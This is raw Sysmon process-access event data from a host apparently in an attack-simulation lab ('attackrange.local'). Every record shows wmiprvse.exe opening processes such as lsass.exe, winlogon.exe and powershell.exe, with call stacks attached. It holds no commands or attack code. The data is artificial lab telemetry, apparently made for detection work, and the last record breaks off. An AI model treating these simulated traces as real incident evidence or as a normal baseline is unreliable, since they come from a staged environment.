15:59:39.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026826Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026825Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6D06-00000000A301}6920C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026824Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026823Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026822Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026821Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026820Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026819Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026818Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026817Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026816Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026815Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026814Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026813Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026812Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026811Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026810Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026809Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026808Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026807Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program 